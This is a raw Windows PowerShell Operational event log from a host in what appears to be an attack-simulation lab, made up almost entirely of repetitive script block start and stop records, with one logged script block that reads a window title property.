SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476161
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476160
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476159
Keywords=None
Message=Completed invocation of ScriptBlock ID: 91fda930-d206-4274-a192-29628da77cea
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476158
Keywords=None
Message=Started invocation of ScriptBlock ID: 91fda930-d206-4274-a192-29628da77cea
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476157
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{(Variable _).Value.MainWindowTitle}

ScriptBlock ID: 91fda930-d206-4274-a192-29628da77cea
Path:
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476156
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476155
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476154
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476153
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476152
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476151
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476150
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476149
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476148
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476147
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476146
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476145
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476144
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476143
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476142
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476141
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476140
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476139
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476138
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476137
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476136
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476135
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476134
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476133
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476132
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476131
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476130
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476129
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476128
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476127
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476126
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476125
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476124
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476123
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476122
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476121
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476120
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476119
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476118
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476117
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476116
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476115
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476114
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476113
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476112
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476111
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476110
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476109
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476108
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
